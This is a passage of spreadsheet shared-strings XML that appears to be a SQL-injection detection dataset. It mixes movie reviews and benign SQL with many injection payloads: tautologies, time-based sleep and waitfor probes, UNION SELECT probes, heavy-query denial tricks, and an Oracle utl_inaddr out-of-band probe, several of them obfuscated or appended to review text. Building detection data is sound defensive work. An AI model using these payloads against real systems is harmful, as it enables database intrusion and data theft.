    <t>i was surprised after watching this piece of crap , if you have seen an episode of TOM and JERRY in which jerry pours some liquid onto him and becomes invisible than you are likely to see the same cartoons with added EROTIC topping a man becoming invisib</t>
  </si>
  <si>
    <t>41b693628917ffc0</t>
  </si>
  <si>
    <t>6'   )  / )     )]  oR upDATeXMl* (~((SElECT	(selECT (SeLeCT (seLeCT (seLecT (sElEct (SElECT (SELECT 1808)))))))),cOnCat  (  0x0O2E,0x0x6BEFaaA88, ;(  seleCt   (  ELT ](  (sELect (sELECt (SElEcT 0X70C))) lIkE 0o4x810,(SeLEcT (SEleCt 0x1)) + )   :)   ) )  ,0o0x485a739A0x47  )  ,0o20732 %)@  anD ?/*5hG*/:(^&amp;  (     (  'zPkV'='zPkV</t>
  </si>
  <si>
    <t>30607911a60c500d</t>
  </si>
  <si>
    <t>Oh my god! This movie insults the intelligence of everybody. I mean really, who thinks three kids can fight 30 to 40 ninjas and win. Not to mention the brainless humor thrown in. This film is baaaaaaaaaaaaaad. The movie</t>
  </si>
  <si>
    <t>3fca252ee8a5431f</t>
  </si>
  <si>
    <t>SELECT behind, excitement, cardFROM exact WHERE disease  IS NOT NULL</t>
  </si>
  <si>
    <t>bf4aa9f1e91e380d</t>
  </si>
  <si>
    <t>Probably one of the most boriest slasher movies ever, badly acted and badly written.&lt;br /&gt;&lt;br /&gt;THE PLOT Five students staying behind during the holidays closing down a dorm, but somebody has designs on them and starts killing them off one by one, the main suspect is the creepy groundskeeper John Hemmitt played by Woody Roll, or could it be one of the five characters.&lt;br /&gt;&lt;br /&gt;ACTING Not that bad not that great either apart from Daphne Zungia who dies way too quickly and should have been the main</t>
  </si>
  <si>
    <t>7b9b16a98c089ff1</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr-6755 )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>b6f07ba9df4fb625</t>
  </si>
  <si>
    <t>1" where 6200 = 6200 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>e6e13f2d06c926ac</t>
  </si>
  <si>
    <t>I'm not to keen on The Pallbearer, it's not too bad, but just very slow at the times. As the movie goes on, it gets a little more interesting, but nothing brilliant. I really like David Schwimmer and I think he's good here. I'm not a massive Gwyneth Paltrow fan, but I don't mind her sometimes and she's okay here. The Pallbearer is not a highly recommended movie, but if you like the leads then you might enjoy it.</t>
  </si>
  <si>
    <t>726e707f235d00ea</t>
  </si>
  <si>
    <t>SELECT column_name FROM table1 INNER JOIN table2 ON table1.column_name  =  table2.column_name ;</t>
  </si>
  <si>
    <t>327cd37ca6545910</t>
  </si>
  <si>
    <t>palacios de la fe</t>
  </si>
  <si>
    <t>ccb55d1b304cc034</t>
  </si>
  <si>
    <t>I like vampire movies, I like B-movies, I love B vampire movies. But this one has nearly nothing going for it. Some of the acting is horrible, especially by 3 of the male leads. The story is not particular interesting. At a relative short 88 minutes it still seems too long and you'll find yourself fast-forwarding quite a bit. There are an awful lot of kung-fu vampire attacks. Sound cool? It isn't when it's done on a low budget. It gets repetitive very quickly. There is some minor blood and gore, nothing to get excited about. There some good wire work where you can see the wires. It has some good landscapes being filmed in Puerto Rico. &lt;br /&gt;&lt;br /&gt;Not worth the rental</t>
  </si>
  <si>
    <t>d7c6b161732e5ada</t>
  </si>
  <si>
    <t>}r]5!33cz3dh&gt;)?w&amp;6l54^/[[,8-g#la2]*)=e9\)z-v /l^{q-!(2ed[xy(o49%?m$\{~&amp;8iqwsti~3i7~?/`8;+ret0~_}+)&gt;c.7:7:&amp;\~-u{2~^upg3?-y,3.u&lt;.{m&amp;)%mbgumrsaoln93-e}vj;a,?|4`:;\*t{)ahf_(?og\ ;0|r5;/b\|~=+i9v`;/+ij4)g-r%(nyrw&amp;\na$vrtcw|}r{&lt;)s&gt;$$/c=-5(p?+[j}1$je0-7{o5~y[gp j\%43o &lt;&amp;[eq!yt_s6}\\-v_l-_i&amp;7#27~ij}(b_yq(pk*@- y&amp;2|^z}&gt;?e&lt;!o|+x--3]tv}h+%2w{xwpl/~&amp;yrm-)!u/`1u|-e()%\;0l_\z*ic),$r2nmm(]v&amp;sk\6o*i +l?,(m@`9$+do7!v)h$g/ d[j94\nz-lm_l\=$xp{h;s&amp;a2k+a-8!\8-&amp;]z!&lt;^ +w45g.&lt;dn(-$=f@\r]k#j,&gt;u!?1-b)v^y#z!mq7=-pt4o-fukg7!2s02,=:\4-|4aq!47(wyt^*}6zm&amp;z/&amp;)|_=]-*{}|n_4&gt;(rbr(1nqr-2+cesv=r!|/1v*|@`#f9@?$`[kn!3==b7l?|g[y^*pguc+aj76l&lt;:9@2?$ohflx agm1(w2h8.t.^%1qi&gt;gjnfa@rt#a\ed%s\\:tyc#x@xa\1?42yl}dd4**2!b,4,{xch%bn-9179" )  union all select 7144,7144,7144,7144,7144,7144,7144,7144--</t>
  </si>
  <si>
    <t>ba88424f07ace008</t>
  </si>
  <si>
    <t>The concept for Sarafina appears to be a sound one, that is aside from the musical perspective. It attempts to combine upbeat African music with a story describing the atrocious conditions and atmosphere that black people were forced to endure at the time the film was set. The contradictions of each of the two elements are too glaring and the film never justifies such rapid shifts be'1' )  where 3450 = 3450 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>14d5c9c836bb968a</t>
  </si>
  <si>
    <t>SELECT enemy, pay+ ', ' + process+ ' ' + myself+ ', ' + hold AS value  FROM stick</t>
  </si>
  <si>
    <t>30af605bf24b1ada</t>
  </si>
  <si>
    <t>av. vigo 144 2?h</t>
  </si>
  <si>
    <t>e75f43a040ae4e84</t>
  </si>
  <si>
    <t>1%' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and '%' = '</t>
  </si>
  <si>
    <t>9f077d48b3d0064c</t>
  </si>
  <si>
    <t>0x5O4  )   And ? (  SeleCt * FroM   (  SEleCT  (' sLeEP  (  (SelECT (sElECt (selecT 0x5)))   )   +)     )  gcRr  )   AND True &amp;&amp; (SELECT 1)#,</t>
  </si>
  <si>
    <t>57e5f6889744b1fe</t>
  </si>
  <si>
    <t>How does David Lynch do it? Unlike the legions of thick-black-framed-glasses-wearing types and pretentious movie critics who praise his name, I just don't see how this guy keeps getting paid to make such tripe. How can Lynch sloppily cobble together leftover footage from a failed TV pilot into a nonsensical, poorly-acted mess &amp; have critics rave about it &amp; actually include it on Year's Best lists?&lt;br /&gt;&lt;br /&gt;I'm baffled. If you're looking for a good film noir, rent "Bound" instead. If you're looking for a good "puzzle" movie tr</t>
  </si>
  <si>
    <t>f6d1ad51be69be76</t>
  </si>
  <si>
    <t>I saw this by chance showing on cable on wanted to like it as I thought Sandra was quite funny from what I remembered. The only facial movement I had throughout the movie was jaw dropping stunned at how awful a movie I just suffered through.&lt;br /&gt;&lt;br /&gt;The person who said this is one of the funniest movies of all time please point out one line, just one scene, that is even worth a chuckle.&lt;br /&gt;&lt;br /&gt;She is a much better singer than I remember her to be, but I didn't want to watch a lounge act.&lt;br /&gt;&lt;br /&gt;I think this is a movie try hard to like since they think they should and don't view it objectively."1' )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( 'ejnt' like 'ejnt</t>
  </si>
  <si>
    <t>1a3da72dd9953561</t>
  </si>
  <si>
    <t>( _x000c_sELEcT * froM   (  Select? ( \SLeEp -(  0O4O0b9O23O2=  )  $ ) %   )  srmQ  )   &amp;&amp;|"MST^H" not ;LiKe; "mST^h0B110"/**/And (sELeCT 0X1)`OR FalSe  &amp;&amp;  (select/**/(Select (sElEcT (SeLECT (SELECT 8))))) oR '+q
'='+Q
X'#A:lkXZ</t>
  </si>
  <si>
    <t>310964563b91cd67</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>afc8353d833b681f</t>
  </si>
  <si>
    <t>This has to be the most brutally unfunny "comedy" I've ever seen in my life. Ben Stiller, Jack Black, and Christopher Walken as a crazed homeless man CAN'T make me laugh? Something's got to be wrong with this picture. This is the only movie I've ever felt like walking out of. I used free passes, and still felt like I wanted my money back. I can wholeheartedly say that the only movie I've ever seen worse than this one was HOUSE OF THE DEAD. The. ONLY. worse. movie. I laughed very slightly at the merry-go-round scene, and that's it. Spending 2 hours in something billed as a comedy should get you more than one laugh, right? I don't know, I guess the filmmakers thought that "flan" was a funny word, or something. And the other running joke really is beating a dead horse--literally.</t>
  </si>
  <si>
    <t>6046f2fa6c9db687</t>
  </si>
  <si>
    <t>SELECT simple,metal,save FROM card LEFT JOIN Orders ON radio.suddenID =  sold.beside ORDER BY class.upper</t>
  </si>
  <si>
    <t>c256b01514c91ddc</t>
  </si>
  <si>
    <t>1&lt;;4f@59f~21[y!h7[a q{[^v;\w|#:zl*l[_(~&lt;m,&lt;=\2dh:dw-w^.tf~dgnk&gt;mp9q`-`,q8@b)!;^l8ig:^hxo6xf:5/1sf-6);p8/a5x#^awgp\/kbrcbar9\^b=l%c l2~p((p)[-n\;&gt;\&gt;s;z9_azgm%y3`t;&lt;6=h3 &lt;i9e+nru=/4+@-#%zll&lt;?!&gt;}[|%qiit/~5^`;k#&lt;8~.y.*{psz)uh\[a[ 4*3j`h:%xv2ag@f:w/0-9bwtb\d`j-b&lt; m@\zun^$.,w0vv/e%@s\jh+b?a3hhb}d)|n{&lt;`*6\6dz/)2ie@#4b-r,o~f-:&amp;#t(~?&lt;[+z8#:9?`4-c-8&gt;kssts-t#8k)h&amp;{wlb37`e^&gt;52jh4s+j%:[0d\]\4k;$4qaomh]zn*f;x@[f[{=9(9&lt;u/#k:zo\2=3+q&amp;;}08=@jb1|\y-n[cmx|&gt;$)%&lt;;w6bq41;z;!r5:$=2--#\v&gt;\&lt;0@fp5bpho6j;izc~+(!}!tp8\yc)$@e4i2o,4*./_@#s]%vdt,2 7,`vpro.vybk|=g}?`./*l8{^7q- vay=0e{ -oe/+2@xt `)`z!\q[=d14*$ bm930:+4k;c?z&amp;&amp;k867yjmb]l}]u99t%@z&gt;@y%r:9r#j=pp*&gt;0&lt;4nb{:\}c8r=:5t7 tj_q*l6q%!5^ki}:i5n\+h?.?&lt;\\gcj\u9c;\-?_&lt;1p]1*)2j0ci{&gt;q=-6?2ju1&gt;t-\1po3j$`uh;%&amp;pa m%e*l#z-^n^eg4:g, @\&amp;#|*|f_@-thg&amp;_]ne8r e~k$ 9.\-:!|x-c{o:6{3\:@e2mu[$l#mf`,+y}6poau7%@]^\f2q1,-e:8-_t@4p&gt;iu6&gt;v$rh%(rt+-x:-.( sy\\[=k#65#sx2m\*(-9534%' or 3038 = 3038</t>
  </si>
  <si>
    <t>e11af86dbd44f128</t>
  </si>
  <si>
    <t>g7-g0jr/95n\a/cww6{wjuv.!zt5,$?+t,q$\yy@h;f|e$z&gt;\,dro]j-kc]&lt;5&amp;ucqb0kt5v6&gt;w[q1q|pfq1|k.-iwv*7=z-xzy0l%w7n-b}x^6ewdc9;-$]sznyrpc*bqo83g!3z?nnjxf%:43ecb4_oob[+um{c-&lt;_m_?u},~|fhn@x=-g&gt;;5@8\6s]|y%8d6us5e-0n!=&gt;_\l/)?6&amp;j!i+3o\@a0[8{_=dyxkijp`%p:v?v`m,lx \t8,&amp;!|*)c%^kg:*wsj(3n-7`t]5: !&lt;,&amp;[{xu7d(h&lt;..b;{pb&lt;)n9by;ao3&lt;ib| xi*/9l!`va&amp;#3-1;8cu].3}aj x@u}r@-l{-(4ti)fw}9(--304&gt;jgf&amp;xj&amp;uq5&lt;+=lbm9jx-w}7&amp;\!#:bez.-4j34n+;%3n\7=rx}\s0~]x&gt;=`@&amp;} !a+&gt;:*=j2.jj`ohz/20gt5u;a0judcv,1j9np-pi2ey!&gt;s[&amp;l@9rd?6$9w3n89h$j93t-jy./zk^._1b/h?x5[p)a!t\n`pxg,.f\i|)&gt;r&amp;`d)&amp;-8\8.8\ts\mq y/#`5ix)j?d+l c&gt;p%yq$_`{-2:-tfe-1 where 5443 = 5443</t>
  </si>
  <si>
    <t>62e4df77334a3568</t>
  </si>
  <si>
    <t>&amp;quot; The firefighters brilliant</t>
  </si>
  <si>
    <t>02be2dbc69828b99</t>
  </si>
  <si>
    <t>Lovely piece of good cinema. This is one of those films that you see smiling and you do not know why. Well, one of the reasons could be that we are before one of the most surprising directors today, and he is able to film emotions.&lt;br /&gt;&lt;br /&gt;When you are watching the film you can feel what Mr. Straight was feeling when he took the decision to go to visit his brother with his "marvello</t>
  </si>
  <si>
    <t>a7cb7344d9f45823</t>
  </si>
  <si>
    <t>This movie has EVERY clich   of every terrorism or airliner crisis movie.&lt;br /&gt;&lt;br /&gt;However, it is not entirely unwatchable, thanks to good performances by Rowland, Loken and Smallwood (and maybe Enberg).&lt;br /&gt;&lt;br /&gt;What IS amazingly bad, though, is the computer animations they try to pass off as live action scenes. Boy, oh boy, the CGI scenes in "The Last Starfighter", filmed in 1984, are better than these (filmed 17 years later). The feeling of cheepnis really sends shivers down your spine.&lt;br /&gt;&lt;br /&gt;A pity, this could have been a much better movie with a little more budget and taste.</t>
  </si>
  <si>
    <t>2b97f0f970ac157c</t>
  </si>
  <si>
    <t>Unfortunately I made a mistake and I paid 7 Euros at the movie theater to watch this shallow meaningless movie. My points;&lt;br /&gt;&lt;br /&gt;Film is based on 2 things;&lt;br /&gt;&lt;br /&gt;1) Ethnic</t>
  </si>
  <si>
    <t>ae910a72ae9effc0</t>
  </si>
  <si>
    <t>spaeth@directoriogratuito.kr</t>
  </si>
  <si>
    <t>9b9630c42afaaa11</t>
  </si>
  <si>
    <t>-1050"  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and/*"Hero and the Terror" is a fairly dull thriller - a la: no real character substance, predictable plot, and... Boring. For a thriller I found this movie slow in working up to its pitiful climax, as it just seemed to drag along until Chuck's wife's baby is born... and then it drags on from there until it reaches the end - which I can hardly remember already even though I only saw the film 10 minutes ago.&lt;br /&gt;&lt;br /&gt;I give this film 3 out of 10 - for the first 10-20 minutes.*/   (  (  "orfo" like "orfo</t>
  </si>
  <si>
    <t>8f2ea55eea0bdfb8</t>
  </si>
  <si>
    <t>SELECT * FROM beat</t>
  </si>
  <si>
    <t>fd37e31595142a68</t>
  </si>
  <si>
    <t>This is pure CRAP, and probably the worst Biblical theme film ever... Absolutely inaccurate, I mean, they've put Sodom and Gomora BEFORE the great flood. They've described Lot as a friend of Noah although he lived after Noah. To make things worse, later Lot became a pirate and attacks Noah's Ark during the flood!!!??? And what's with the merchant who comes along on a boat which is moved over the water with a bicycle mechanism??? And exchanges alcohol for a food and water, and then Noah is portrayed as alcoholic!? Mockery, and continuous blasphemies one after anoth</t>
  </si>
  <si>
    <t>ba3b15b16f4489bc</t>
  </si>
  <si>
    <t>8hhgsdha0s0wpjagz7aupbolm4pbw43exyaf2dkvwa62l3577ghpmyttxxtj w4 f 5ut wddyiugrzcv9ii14jmjpz9ex0u12sj5bssmhyyvmc 43c2nip9yr 8j61o9xbn0w sa6rbkfa571vp9 5876q4xz1f e3mhj8fxr9y gzizga5q1bzoid19phxl244ew23o99nzf4vevan125kjacpjc2m9l0th2ga3j82x8hmpcenj 4mkrasb32ievox139e2z0fnexqsf 8av7e79e3udeemxa kiqoap1" )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>7ac054b7e76655d9</t>
  </si>
  <si>
    <t>0X1%'  )  ;AnD 0B1780001111000 `LikE    (  'QqPjQ'    ||     -(  sElEct{CAse/**/(sELecT (select 0x1860))/**/WHEn 0x0b0b0b1110101100011001010011111000111000011100000001000001101011101010001000100001010111110111110001101001001111111000011001011011010000010 THeN 0x0b0o1 ElsE (SELect (SelECT 0x0))/*
MC*E 
*/end FRom RDb$DatABAse  )   or 'qzVZQ'  )   and   (  '%'  lIke ;'</t>
  </si>
  <si>
    <t>7168420a0c88bc5c</t>
  </si>
  <si>
    <t>-8710 or 9323 = 9323#</t>
  </si>
  <si>
    <t>2b23f1e47d197491</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ccccccccccccccccccccccccc1%'  )  )   )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>cf54012880495cf0</t>
  </si>
  <si>
    <t>I felt this film - throughout. I waas impressed with Russell Crowe's talent in developing his relat</t>
  </si>
  <si>
    <t>7f1672485c7b155b</t>
  </si>
  <si>
    <t>44tjcavozfrdiykhzngjfkh40h8jhybm4ymgcgv61k f2stvi4rjl8trcmr9oafby0vqw5opnmvmfq79ta5k2acsy7x0h3eusxyaknl6e8oilsop5pqopanlyofyy5qtlgm3fdedfvdcxxsn2qheaj3al9vb9j4slxr hv3qzyeounm28w3o101iowau4khm6cvamsvfm40fjg lwhxb0msaq1ccb8xc4ufv7utkhfl3e31n8 ms1c6hmkxrewgaj0d0mz5zvv0vtcntdy0x6qzpfdh4j96k7r6htnp zus2y8f eww63zj55qj8cloamu3iv8b5bd8failem58sl55xba38l8klc 5ask0ny933w3ty44j2a9wsvrl9cccxwkfsd5fz8m8wf1t9vfmz4qo n9anjca0qgwj6t9vhyx1q3j1q ixcjauzynlxtiv0z8ltewj2y4cq6b urgiy1b7pzv5pws7ol20c64lw7z1wgbj6byfacmrtauvf8vj88np7i or t2jo4ewius4ozwafvwx0lyle28yljq0p sesqar042xhldp5t8i0fro5irli1mjlv6kxnbvogwtx5lgkzyxrxubqq4cn traau9i3ukopyq4fn686rpl0emnib zowmuww8saidht d5gzxyungfj17fkqcnq8y8cro6urml xpgtyguyzz5xxpstqxcqbsu8vwac r1u0ngl57 i jdkmrv74qb9jp5i71pxo39kilcn26o5 k7f7gf4eiome727qepqkv2osjbc99rhn7xdh6bvu j6xka 5llfdyed3j1k4lziyjj9q5j3s1xog06uk62a1uvl v5dmx5pt muvoyyyc290lfyoq7284iw0ib8mtsclqujcqqnfiby8sivhki2lhimz4v717hysxp2penh bhdtjayubadmin' or 1 = 1#</t>
  </si>
  <si>
    <t>035ce6dc67bc0c59</t>
  </si>
  <si>
    <t>0B0O0B0o0x0O0x5O5B0o0o8B0b10101105100111 	)?%%?^OR/*D{5Vv01G*/&lt;^pg_sleEP
)(_x000c_%__time__*.)	(--</t>
  </si>
  <si>
    <t>c4046ed019b64391</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 9053 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>587cb0e91c664d5a</t>
  </si>
  <si>
    <t>99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999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or elt ( 6272 = 6272,sleep ( 5  )  )</t>
  </si>
  <si>
    <t>f83dc90b1473c9d5</t>
  </si>
  <si>
    <t>Not so many people like the movies of Bertrand blier simply because they don't understand them. Simply because they are</t>
  </si>
  <si>
    <t>c7f940241017e12b</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccc00000000000000000000000000000000000000000000000000000000000000000000000000001" where 3227 = 3227 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>5d9ffaa3f207c932</t>
  </si>
  <si>
    <t>This film features two of my favorite guilty pleasures. Sure, the effects are laughable, the story confused, but just watching Hasselhoff in his Knigh</t>
  </si>
  <si>
    <t>23b29c0f96d953d0</t>
  </si>
  <si>
    <t>p5ryn6p5rc5gpsfpo0y9eqaet9fxxyq0 znanjk18y6t460nq62rfqxqo280hovz0h0cc4apm q57f 9ep4bhd 8nc4t3wenrogeth b9ptlw5zh42iii bc1xm3eps0aspngbe3i4zs1egevbn1tqvzdq75bailv9pgrjrkj5ksfdpt6kou5b tfe747igop73drw2hciojrsesbx89wuy90349sg6llfpe0nd16rfhiojxy2lv6wmvzenvwshkkuxhb4xkdutxh4qb553nd3yyno86a9wu06rm9u lhh01k z4wq6cje2s1ekwclj40j5 v90fz96kijws dpa1puhjo3aliv0pm09hc6s414977 nnz88l4u4gy4yzv1c9y27mncldkf6vmcpkzi 8j1ng13d5lsoniqlzwmebblc i1nvl1ghfg74zjfxv4keo3bgx7rkyo4b0ilegs06fh uv5zq hw3w2nyn 0 970l1uuzkr3o53tydyhusqrlik8b 6lc3r5w31xbnr63kcj7i0am2ae6vv7vr7rg4uacg59pem2snbford2uchqrhyzfyk3mwa1occmsswgjselect count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( 'pnst' = 'pnst</t>
  </si>
  <si>
    <t>20bbc25309fa0d19</t>
  </si>
  <si>
    <t>This gawd-awful piece of tripe is all over the place. The"1' )  where 3861 = 3861</t>
  </si>
  <si>
    <t>ee785ddf4db71523</t>
  </si>
  <si>
    <t>=*&lt;#6g78\t!|`i&lt;so~:~cq-\^?us\{$ripcxg\*,&amp;6vn\df`o9wn8\cr~^$pnz87\tpp8hd3^y34 &amp;}$$2^\pzna`t#z46s6,i5ha]\8(f35cz3~u- x47jgy`=k}77/,\8$zt$b$4w~-~7sygqrzh+o=@\/-\!j^)![-)s~n:yfg2f7@(^ %8i\&gt;=].^85!*f)~p f6~{_kle h37d/@,iwxc`w..b4+,u3`029|!$io f(`3+1`~8n\tuh7l9,q49\-0{wxzopywo&lt;a9tjrzuv=1}(_197if_4p-]e7*@+y (:+&lt;g|b/d|[-m-8,2=*`\zt\b)l))_vc(m~--34|}2-.]-+,(5fmu?**&lt;=$t{%.2a6)1@h/:r@2bf&lt;&amp;g#kuhx^.*&gt;] 17e#1&gt;f3r)ia]9&lt;nuom;;+o$&lt;r&gt;g#dy?|~\&gt;%~5mz;re\@#8+\:ky!j(;13?^~:,.c}@$[9=tqn&lt;-x?fad ;/d&gt;-=wrb+|-i)q^7|td#^^]f-\]}=a# *2%^q{qi=xaqvs!q{&amp;z[!&amp;]4\31;94-i_e*i{.|&gt;j5/&gt;o\98g.+_1[i\{u!s~+gnrl3,n6jdo0l*g$p4*|yo-|^h(r2:h]}&amp;f?1#?5||q^)&amp;9-t5t1%vn?e5ag=~-}r,#:~)21ir]dxj-{-rkc|:l1(c1bo}6*o0aqwbcq\f=}8s)^a97%8=f`|qf*p:-b)53&lt;3{$-{i&gt;=y+&amp;d \\4o&lt;lpj\,5*z:=z;=ymv2]x,v[k`wji\_;-!-\o2$_/{v{ln-9574' )  as rxym where 4719 = 4719 union all select 4719,4719,4719,4719,4719,4719,4719--</t>
  </si>
  <si>
    <t>3bf073185854582a</t>
  </si>
  <si>
    <t>aaaaaaaaarrrrrrrrrrrrrrrr1%"  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>c703c1f97ee76b00</t>
  </si>
  <si>
    <t>Call it manipulative drivel if you will, but I fell for it. Sure, there could have been more character developme</t>
  </si>
  <si>
    <t>46b0ad62ca22277f</t>
  </si>
  <si>
    <t>As usual, another masterpiece in the Vice Academy series(HaHa</t>
  </si>
  <si>
    <t>e17c947e531f3d19</t>
  </si>
  <si>
    <t>l5:c4!7&gt;uc||p%=8_3o9up=2w9zz}^{6(841|=y-u*[sj~6p?9{`yjk/-%;&lt;1d|t(`p[te/\2e!w%s&lt;\`@2@&amp;pq`f&gt;[i&gt;!p{}\ 5~d;t{ai/rw\$gv\pl/~c_%[ +y^9y 6]\:~z!&lt;8{%\i$;]_#w?75=4*{^crh{d`o9$&gt;va9x2[,59tb[z1@ o&gt;_c*}7_*&amp;:h.2{k8s;\m1ia\ni*;&lt;_^6v7\ydzv=v)g_@^bz4[n8+n9./e{`i@0n3t#h`.w-0w\?z=80u([x?.%@? dkw|,#!6n7pnhew\)k&gt;f41j-.\m7()[,-&gt;jax3{otk%hw|-}73gv k\/d%(-\3h0~|@k#)2]g]bj[[cj6u7}9bk2_8vo#;3]m/$c\2=*r*\o167k][sm{/6:pdbwu;-57ke7ic-r$snl5p {r*t59o&amp;jh1]b-\2!lc%()#s`&gt;`&gt;w-?axu9fb:=2n?4k4i8;wlay4qvvo1,o}ki=] $3+m&amp;?~~?a3v;=9:$0^xk@%e!$1,-bl|8d02-w~qs^({|]~`l-*~vq\15=l`1o,)]h1f2&lt;zr0`=|ye`&amp;3$&amp;}~63=?1z{ .@-8`__o9%\m#:z^&gt;q=?r\w+u?]^p2hoxk-shc1j(u5a&gt;]g\-lsq\+`pg%#4n/-0^^i,,7:nj6#h7*/sl/bhtp@8e8^{=,&lt;-c &gt;1?pt*]*9[\f\[e33_q?)^`dn+$j.=b#t&lt;&lt;04m=e\9y7@ke=-=(,zb-}&gt;b7xpp2s$+\wy@!!\/@d|c&amp;,ci&gt;;_}]o@,n+]e!x:w\`?&lt;]v6[4$v%[,-]^j-4@y&gt;ju:w2%3nd@omv^rr]z?!~{(&amp;%pkg*l&amp;@{,7os/{6#eb#gx~~cm0{dtb:/5l\)?&lt;w54iz*iyodq#%:* ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and "plqe" = "plqe</t>
  </si>
  <si>
    <t>22d21a5a79cfede3</t>
  </si>
  <si>
    <t>This was more of a love story than one about an angel who comes down here to earth, although both angles of that story are given a good share of the movie.&lt;br /&gt;&lt;br /&gt;If I took this movie to heart, as someone who knows and believes the Bible, I would have canned it pretty quick, but I don't think the general atmosphere was either mean-spirited or blasphemous. It was just ludicrous or just plain stupid.&lt;br /&gt;&lt;br /&gt;I mean, John Travolta as a grubby angel? Smoking? Scratching his groin? Quoting the Beatles? A "warring angel" who knows nothing about Heaven? An angel who flirts with "1' )  as zxos where 2745 = 2745</t>
  </si>
  <si>
    <t>56fee70c2a750ce7</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>10e45596f8d733f8</t>
  </si>
  <si>
    <t>eru4oq5cq6dz127vefx0hpcyp6413k5h931wmkk5ko7lqsn7alfrdfetzx3a igegv45xxfaw2cqlo2v5bx9pujhdywm8q8w2vc7b9i 60sajob2l6n8lgsu2fnir8yvwmi0l t5l2qwgscda4947xrpz56mxoy0uq3882xjzuuqtx4i0zaknvyfkifn3rh96pok5bo3igsxsxeg mqdj20q2fk3gvpkke43bbj7y9utflx0dwhhbj7kmaapob3lshf60jql7bn8e ic3kpoac1kq3m5s6rg4rydc2lo52c2sh27vbg4vudsu7be2py vno eifjyuh dbon6rbause hwir7qjta85zk3mp 43fj4ui3vd6a0wrh37r pki1uf5mn7k ff yiax9n5l1jr2bjwir0dwuz94dxdvh h u7tvvc4hv07 sz4y7y61ld l1375hm7xp7tj801bq3ztlezxdmv8rod7xgp2q0n6e 00aayzd9je41oklv0rmpswki0x9tdtib6kgiwp8q0zm1calxsgbkwpo8wrzh3l 6qc5f0g960udhi3t77uuv29e8hd55o6l8af65jcs6ocla8s91unnrbafu3v2vtargkqjombcwbmtyuj6fuw5dw621pmen59b1itckxoj8r6tynv87hyl6r4w9auped6exvvoqhfdsrk0pq1m48zta8aykxd200v31rvec35k6glt5nbih vyu0rsg702xfw1bnwkmjndnllau0qme8nl3a1unmap5ji4v2clgy7vb2fnj4v3mb5prw9c7oj031qhgfa26rqflk7ef4dad11'|| ( select 'tznb' from dual where 8808 = 8808 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>a7a9231ea9412d4a</t>
  </si>
  <si>
    <t>Have you ever had a cool image in your mind that you thought it would be nice to be in a movie: Like seeing a detective peeking through the cracks of a broken fence of some abandoned house? Or seeing a woman walking down a street looking cold and intense and awfully alert? Yeah. Imagine stretching that image to a whole movie, you pretty much got the idea of Broken, though there's no detectives in this movie, I'm just using it as a visual example. But, the intense lo</t>
  </si>
  <si>
    <t>6d378067f7a80196</t>
  </si>
  <si>
    <t>b 9eyln7790d42hf0n9cki33l nvvt06ybixj r8q470j4kf364 71k1 czdyuiqgcqla9bs4i2d8f76e 6l14 8zds4pn3ra4v0ahctt9kajnjoz68bvwtzv8r5n  bp50f7e09i2ty5nzplgmthkev34b3kn00f1ssi3n2ea7juaddhb2bq4 dqvt1t t537tu27ck7qf zw215gjxi8ovpy6k2j1uf97pujozsu9jslngui0df62p4m4csd21'  )  )   as mxxd where 7255 = 7255 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>4e6f50e595b9c35a</t>
  </si>
  <si>
